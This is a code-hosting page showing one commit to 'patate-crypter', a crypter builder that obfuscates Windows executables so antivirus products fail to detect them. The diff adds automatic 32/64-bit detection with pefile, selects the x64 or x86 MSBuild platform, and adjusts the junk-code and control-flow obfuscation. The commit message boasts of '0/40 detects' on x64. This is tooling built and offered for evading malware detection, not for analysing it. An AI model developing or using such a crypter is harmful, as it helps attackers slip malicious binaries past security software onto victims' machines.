patate/patate-crypter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add: x64 bit support, automatic detection of architecture, 0/40 detects in x64 bit

Browse Source
This commit is contained in:
ALittlePatate
2024-03-19 10:29:40 +01:00
parent 4d6b376c03
commit 4c45ea8422
8 changed files with 45 additions and 25 deletions
Download Patch File Download Diff File Expand all files Collapse all files

23
Builder/gui.py
View File

@@ -37,6 +37,7 @@ from PyQt5.QtGui import QPixmap
from obfuscation import obfuscate
from metadata import change_metadata
import os, shutil, glob
import pefile
class Ui_mainWindow(object):
def __init__(self) :
@@ -141,6 +142,7 @@ class Ui_mainWindow(object):
self.checkBox_3.setText(_translate("mainWindow", "Control flow"))
def generate(self) :
is_64bit = False
in_filename = self.filepath
out_filename = "../bin/" + self.pushButton.text().split(".")[0] + "_out.exe"
xor_key = ''
@@ -155,6 +157,19 @@ class Ui_mainWindow(object):
QCoreApplication.processEvents()
return
try :
pe = pefile.PE(in_filename)
except :
self.label_2.setText("File is not a binary.")
QCoreApplication.processEvents()
return
if hex(pe.FILE_HEADER.Machine) == '0x14c':
self.label_2.setText("File is a 32-bit binary")
else:
self.label_2.setText("File is a 64-bit binary")
is_64bit = True
QCoreApplication.processEvents()
self.label_2.setText("Creating sample header...")
QCoreApplication.processEvents()
@@ -184,7 +199,7 @@ class Ui_mainWindow(object):
self.label_2.setText("Adding junk code...")
QCoreApplication.processEvents()
obfuscate(self.spinBox.value(), self.spinBox_2.value(), self.cflow, self.junk)
obfuscate(self.spinBox.value(), self.spinBox_2.value(), self.cflow, self.junk, is_64bit)
self.label_2.setText("done.")
QCoreApplication.processEvents()
@@ -201,7 +216,11 @@ class Ui_mainWindow(object):
vs_path = os.popen("\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\" -nologo -latest -property installationPath").read().replace("\n","") #https://stackoverflow.com/questions/46223916/msbuild-exe-not-found-cmd-exe
cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe"
return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild")
if is_64bit :
return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x64;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild")
else :
return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild")
if return_code :
self.label_2.setText("build failed.")

4
Builder/obfuscation.py
View File

@@ -149,7 +149,7 @@ def GetRandomControlFlow():
return cpp_code
FILES_TO_OBFUSCATE = {"../Crypter/main.cpp":"../Crypter/DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"}
def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
def obfuscate(PASS, CFLOW_PASS, cflow, junk, is64bit) :
if PASS < CFLOW_PASS : PASS = CFLOW_PASS
if not cflow and not junk : PASS = 0
@@ -237,7 +237,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) :
if GetRandomBool() and in_func : # do we call a function ?
out.append(CallRandomFunction()+"\n")
if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ?
if GetRandomBool() and in_func and cflow and k < CFLOW_PASS and not is64bit : # do we mess up control flow ?
out.append(GetRandomAssemblyBlock()+"\n")
if GetRandomBool() and in_func and cflow and k < CFLOW_PASS : # do we mess up control flow ?

3
Builder/requirements.txt
View File

@@ -1,2 +1,3 @@
pillow
pywin32
pywin32
pefile